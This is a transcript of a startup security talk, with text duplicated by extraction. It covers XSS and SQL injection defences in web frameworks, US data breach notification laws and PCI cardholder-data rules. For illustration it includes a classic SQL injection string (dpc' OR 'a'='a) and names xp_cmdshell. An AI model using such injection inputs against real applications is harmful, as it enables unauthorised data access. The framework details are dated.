Hacking and Hacking and Compliance in a Web Compliance in a Web 2.0 World 2.0 World Damon P. Cortesi, CISSP Damon P. Cortesi, CISSP Director @ Alchemy Security Director @ Alchemy Security Stats Nut | Security Geek | Stats Nut | Security Geek | Builder of Tools Builder of Tools
30
Embed
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 World
Damon Cortesi of Alchemy Security presents the most effective ways to plug the most common holes found in web services. Learn about XSS, SQL injection, and why you should care about these things now instead of later.
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Hacking and Hacking and Compliance in a Web Compliance in a Web
2.0 World2.0 WorldDamon P. Cortesi, CISSPDamon P. Cortesi, CISSP
Director @ Alchemy SecurityDirector @ Alchemy Security
Stats Nut | Security Geek | Builder of Stats Nut | Security Geek | Builder of ToolsTools
$ whoami$ whoami
Connecticut >> Chicago >> Seattle (2006)Connecticut >> Chicago >> Seattle (2006)
@dacort on Twitter (@dacort on Twitter (http://tweetstats.comhttp://tweetstats.com))
Things you still need to watch out for.Things you still need to watch out for.
E-commerce Startups and ComplianceE-commerce Startups and Compliance
What is this PCI thing you speak of?What is this PCI thing you speak of?
Privacy Policy and Data Breach Notification Privacy Policy and Data Breach Notification Laws.Laws.
And maybe if we’re lucky...demo time.And maybe if we’re lucky...demo time.
Web 2.0 FrameworksWeb 2.0 Frameworks
Rails, Django, CakePHPRails, Django, CakePHP
Rapid Development, Data abstractionRapid Development, Data abstraction
Alleviates common security pain pointsAlleviates common security pain points
SQL InjectionSQL Injection
Cross-Site Scripting (kind of ...)Cross-Site Scripting (kind of ...)
Typical challenges still presentTypical challenges still present
The “kind of” - XSSThe “kind of” - XSS
As of Django 1.0 (Sep 2008), HTML is auto-escapedAs of Django 1.0 (Sep 2008), HTML is auto-escaped
YAYYYYYYYYYYYY!YAYYYYYYYYYYYY!
Does Rails? ------------------------- NoDoes Rails? ------------------------- No
Does Google App Engine? -------- NoDoes Google App Engine? -------- No
Really? Yup, really. (No domain-wide cookies, Really? Yup, really. (No domain-wide cookies, phew!) phew!)
Does ASP.NET ---------------------- On built-in controlsDoes ASP.NET ---------------------- On built-in controls
Also has built-in request validationAlso has built-in request validation
Define BrieflyDefine Briefly
SQL Injection - Unsanitized data being passed SQL Injection - Unsanitized data being passed to a database, potentially executing arbitrary to a database, potentially executing arbitrary code.code.
dpc’ OR ‘a’=’adpc’ OR ‘a’=’a
xp_cmdshellxp_cmdshell
XSS - Unsanitized data being re-displayed and XSS - Unsanitized data being re-displayed and interpreted in the browser.interpreted in the browser.
Can ultimately allow for compromise of user Can ultimately allow for compromise of user data (cookies) if trusted domain is vulnerable data (cookies) if trusted domain is vulnerable to XSS, etcto XSS, etc
Some Other Things...Some Other Things...Keeping systems/software up-to-dateKeeping systems/software up-to-date
Some of that data is restricted, though!Some of that data is restricted, though!
Personally Identifiable Information (PII)Personally Identifiable Information (PII)
Data Breach Notification LawsData Breach Notification Laws
Payment Card Industry (Credit Cards, PCI)Payment Card Industry (Credit Cards, PCI)
So you’re building a web service...So you’re building a web service...
...what do you need to know?...what do you need to know?
Planning and ProcessPlanning and Process
44 states have data breach notification laws44 states have data breach notification laws
Name, address, emailName, address, email
Social Security NumberSocial Security Number
Passport ID, License NumberPassport ID, License Number
If you are compromised and the above is If you are compromised and the above is unencrypted and compromised - you must unencrypted and compromised - you must notify data owners.notify data owners.
Data Breach/Privacy Data Breach/Privacy PolicyPolicy
Data Breach Laws are why services such as Twitter Data Breach Laws are why services such as Twitter and Evernote have this in their Privacy Policy.and Evernote have this in their Privacy Policy.
If Evernote learns of a security system breach we may attempt to notify If Evernote learns of a security system breach we may attempt to notify you and provide information on protective steps, if available, through you and provide information on protective steps, if available, through the e-mail address that you supplied during registration or posting a the e-mail address that you supplied during registration or posting a notice on our web site. Depending on where you live, you may have a notice on our web site. Depending on where you live, you may have a legal right to receive such notices in writing. -- legal right to receive such notices in writing. -- http://evernote.com/about/privacy/http://evernote.com/about/privacy/
We will make any legally-required disclosures of any breach of the We will make any legally-required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically security, confidentiality, or integrity of your unencrypted electronically stored personal data to you via email or conspicuous posting on this Site stored personal data to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay. -- in the most expedient time possible and without unreasonable delay. -- http://twitter.com/privacyhttp://twitter.com/privacy
PCI only applies to you if you “store, process, or PCI only applies to you if you “store, process, or transmit cardholder data.”transmit cardholder data.”
Want the PCI compliance monkey off your back?Want the PCI compliance monkey off your back?
““It’s simple, just don’t ever store, process, or It’s simple, just don’t ever store, process, or transmit cardholder data - let someone else transmit cardholder data - let someone else do it for you.”do it for you.”
And if you must store, process, or transmit ... call And if you must store, process, or transmit ... call us.us.
PCI If You Have ToPCI If You Have To
Cardholder data is defined as the primary Cardholder data is defined as the primary account number (“PAN,” or credit card number) account number (“PAN,” or credit card number) and other data obtained as part of a payment and other data obtained as part of a payment transaction, including the following data transaction, including the following data elements:elements:
PANPAN
Cardholder NameCardholder Name
Expiration DateExpiration Date
Service CodeService Code
Sensitive Authentication Data: (1) full magnetic stripe data, (2) Sensitive Authentication Data: (1) full magnetic stripe data, (2) CAV2/CVC2/CVV2/CID, and (3) PINs/PIN blocksCAV2/CVC2/CVV2/CID, and (3) PINs/PIN blocks